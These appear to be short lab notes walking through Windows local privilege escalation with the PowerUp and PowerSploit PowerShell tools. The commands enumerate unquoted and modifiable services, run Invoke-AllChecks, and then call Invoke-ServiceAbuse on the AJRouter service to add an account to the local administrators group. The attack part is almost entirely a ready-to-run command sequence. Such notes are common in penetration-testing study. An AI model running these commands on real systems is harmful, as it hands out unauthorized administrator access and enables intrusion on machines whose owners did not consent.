Local Privilege Escalation

PowerUP:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1

Get services with unquoted paths and a space in their executable path:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted –vebose

Get services where the current user can write to its binary path:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService –verbose

Get the services which current user can modify:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService –verbose

Get he services where the current user can write to its binary path:

A lot more in output.

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-WmiObject -class win32_service | fl *

A lot more in output.

Now Run all checks:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Invoke-AllChecks

Now on another Powershell

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> . .\PowerUp.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Invoke-AllChecks

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> help Invoke-ServiceAbuse

PS :\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> help Invoke-ServiceAbuse –Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Invoke-ServiceAbuse -name AJRouter -username ‘SECURITY\administrator’

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> net localgroup administrators

@Saksham Dixit